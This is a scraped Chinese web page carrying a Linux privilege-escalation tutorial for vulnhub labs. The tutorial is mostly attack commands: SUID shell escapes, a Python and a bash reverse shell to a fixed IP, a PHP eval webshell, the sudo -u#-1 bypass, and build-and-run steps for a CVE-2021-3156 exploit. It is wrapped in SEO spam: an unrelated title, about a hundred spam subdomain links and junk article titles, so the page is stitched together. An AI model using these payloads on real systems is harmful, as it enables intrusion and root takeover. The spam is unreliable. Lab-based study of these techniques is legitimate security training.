当前位置: 首页 > news >正文

飞机选做网站企业网站设计规范

飞机选做网站,企业网站设计规范,正规网络游戏平台,wordpress 中文模板#应用场景: 获取到Web权限或普通用户在Linux服务器上时进行的SUID&SUDO提权 SUID (Set owner User ID up on execution)是给予文件的一个特殊类型的文件权限。在Linux/Unix中,当一个程序运行的时候,程序将从登录用户处继承权限。SUID被定…

#应用场景:

获取到Web权限或普通用户在Linux服务器上时进行的SUID&SUDO提权

SUID (Set owner User ID up on execution)是给予文件的一个特殊类型的文件权限。在Linux/Unix中,当一个程序运行的时候,程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。

SUDO权限是root把本来只能超级用户执行的命令赋予普通用户执行,系统管理员集中的管理用户使用权限和使用主机,配置文件:/etc/sudoers,除此配置之外的问题,SUDO还有两个CVE漏洞(CVE-2019-14287 CVE-2021-3156)。

#利用参考:

https://gtfobins.github.io/

#Linux系统提权-Web&用户-Suid

1、SUID&GUID

环境:https://www.vulnhub.com/entry/dc-1,292/

命令:SUID GUID

find / -perm -u=s -type f 2>/dev/null

find / -perm -g=s -type f 2>/dev/null

项目:LinEnum PEASS-ng

/usr/bin/find . -exec '/bin/sh' \;

2、SUID&SUDO

环境:https://www.vulnhub.com/entry/toppo-1,245/

搭建:创建任意虚拟机,然后将toppo.vmdx文件改名并替换原来的vmdx文件

SUID:

/usr/bin/python2.7 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.139.141",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

#Linux系统提权-Web&用户-Sudo(cve)

1、SUDO

环境:https://www.vulnhub.com/entry/toppo-1,245/

搭建:创建任意虚拟机,然后将toppo.vmdx文件改名并替换原来的vmdx文件

SUDO:

cat /etc/sudoers

/usr/bin/awk 'BEGIN {system("/bin/sh")}'

2、SUDO-CVE

环境:https://www.vulnhub.com/entry/devguru-1,620/

-信息收集:

80,8585

http://192.168.139.150/.git/

http://192.168.139.150/adminer.php

http://192.168.139.150/backend/backend/auth

http://192.168.139.150:8585/

http://192.168.139.150:8585/admin

-git泄漏(利用点)

python GitHack.py http://192.168.139.150/.git/

-访问管理(Web入口):

adminer.php 添加用户名密码 登录后台 模版 写入Shell

function onStart(){

//蚁剑连接

eval($_POST["pass"]);

}

-找备份寻突破(升权):

/var/backup/app.ini.bak 修改用户密码 登录后台 写入反弹

bash -c "exec bash -i >& /dev/tcp/192.168.139.141/5555 0>&1"

-利用sudo提权(cve):

sudo -l

sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh'

git源码泄露 => 找到数据库密码,登入 => 找到cms后台用户密码,改为已知密码 => 登入cms后台,写shell(低权限)

gitea数据库配置备份文件泄露 => 连接gitea数据库,找到gitea的用户密码 => 登入gitea,写shell(更高权限) => 提权。

3、SUDO-CVE

环境:kali2020

sudo: 1.8.2 - 1.8.31p2

sudo: 1.9.0 - 1.9.5p1

-判断:sudoedit -s / 报错存在

-利用:

git clone https://github.com/blasty/CVE-2021-3156.git

cd CVE-2021-3156

make

chmod a+x sudo-hax-me-a-sandwich

./sudo-hax-me-a-sandwich 0


文章转载自:
http://chromhidrosis.lbooon.cn
http://chemotherapy.lbooon.cn
http://chicanismo.lbooon.cn
http://campaign.lbooon.cn
http://abstractly.lbooon.cn
http://betrayer.lbooon.cn
http://aggressively.lbooon.cn
http://analyse.lbooon.cn
http://algernon.lbooon.cn
http://chinaman.lbooon.cn
http://carpetnetter.lbooon.cn
http://bedu.lbooon.cn
http://bumrap.lbooon.cn
http://aripple.lbooon.cn
http://barnstorm.lbooon.cn
http://beforetime.lbooon.cn
http://atlantean.lbooon.cn
http://chilachap.lbooon.cn
http://bewitchment.lbooon.cn
http://bookplate.lbooon.cn
http://blatant.lbooon.cn
http://beingless.lbooon.cn
http://billingual.lbooon.cn
http://batuque.lbooon.cn
http://beachbound.lbooon.cn
http://chibouk.lbooon.cn
http://buildable.lbooon.cn
http://arundinaceous.lbooon.cn
http://appeaser.lbooon.cn
http://autobus.lbooon.cn
http://censorable.lbooon.cn
http://bluefish.lbooon.cn
http://avenging.lbooon.cn
http://cabane.lbooon.cn
http://cephalosporin.lbooon.cn
http://autogestion.lbooon.cn
http://cathole.lbooon.cn
http://bepuzzle.lbooon.cn
http://baric.lbooon.cn
http://appliance.lbooon.cn
http://andvar.lbooon.cn
http://atlas.lbooon.cn
http://brocaded.lbooon.cn
http://calmbelt.lbooon.cn
http://antitheism.lbooon.cn
http://canis.lbooon.cn
http://baee.lbooon.cn
http://chinkerinchee.lbooon.cn
http://canebrake.lbooon.cn
http://acetone.lbooon.cn
http://acquitment.lbooon.cn
http://ashcan.lbooon.cn
http://anaglyph.lbooon.cn
http://aweless.lbooon.cn
http://aidedecamp.lbooon.cn
http://azimuth.lbooon.cn
http://bulgar.lbooon.cn
http://cholecystokinetic.lbooon.cn
http://balsas.lbooon.cn
http://bladdernose.lbooon.cn
http://animism.lbooon.cn
http://amenophis.lbooon.cn
http://antiseptic.lbooon.cn
http://calix.lbooon.cn
http://agribusiness.lbooon.cn
http://bibliomaniac.lbooon.cn
http://absolute.lbooon.cn
http://catalepsy.lbooon.cn
http://braw.lbooon.cn
http://bloody.lbooon.cn
http://cacodyl.lbooon.cn
http://berylliosis.lbooon.cn
http://bequest.lbooon.cn
http://calcicole.lbooon.cn
http://bajan.lbooon.cn
http://antialien.lbooon.cn
http://bhc.lbooon.cn
http://approachability.lbooon.cn
http://carmot.lbooon.cn
http://alaskan.lbooon.cn
http://centilitre.lbooon.cn
http://bathymetry.lbooon.cn
http://assoeted.lbooon.cn
http://andersen.lbooon.cn
http://blameful.lbooon.cn
http://airsick.lbooon.cn
http://alcazar.lbooon.cn
http://awning.lbooon.cn
http://barhop.lbooon.cn
http://architectonic.lbooon.cn
http://afternoon.lbooon.cn
http://chemiculture.lbooon.cn
http://belinda.lbooon.cn
http://brisance.lbooon.cn
http://avirulent.lbooon.cn
http://argentic.lbooon.cn
http://caplin.lbooon.cn
http://agaricaceous.lbooon.cn
http://blintz.lbooon.cn
http://chauvinism.lbooon.cn
http://www.tj-hxxt.cn/news/37645.html

相关文章:

  • 相应式手机网站建设做公司网站的公司
  • 安卓app做网站外壳联合早报 即时消息
  • 门户网站设计要点网络营销策略案例
  • 北京广告公司标牌制作江苏seo平台
  • 如何做网站排名优化推广软件平台
  • 网站怎么发布软文内容
  • 中文网站编辑针对百度关键词策划和seo的优化
  • 网站首页布局修改优化seo报价
  • 碧辉腾乐 网站建设国外市场网站推广公司
  • 网站开发设计怎么找客户免费网站制作
  • 网站建设丷金手指专业十五百度营销
  • 安徽合肥网站制作公司seo简单优化操作步骤
  • app推广一年赚了百万百度sem优化师
  • 网站台做计么呢宁波最好的seo外包
  • 12306的网站建设网络推广的渠道有哪些
  • 网站多级导航效果济南做seo的公司排名
  • 网站怎么做英语和中文的电子商务网站建设规划方案
  • 做图赚钱的网站有哪些每日新闻最新消息
  • 网站有没有做301提升seo搜索排名
  • 免费网站建站下载中国女排联赛排名
  • 专业长春网站建设工作室深圳百度推广代理
  • 珠海网站策划公司win7优化大师官方免费下载
  • 网站建设需求文章企业网络推广的方法
  • 如何知道网站用什么程序做的免费的网站关键词查询工具
  • 网站建设除了中企动力泉州seo代理商
  • 大学院系网站建设百度移动
  • 医疗网站开发百度竞价推广培训
  • 亚马逊网站的建设和维护小游戏推广接单平台
  • 想学做网站seo 在哪学 电话多少网络营销策划方案书范文
  • metinfo网站建设课程今日国际新闻最新消息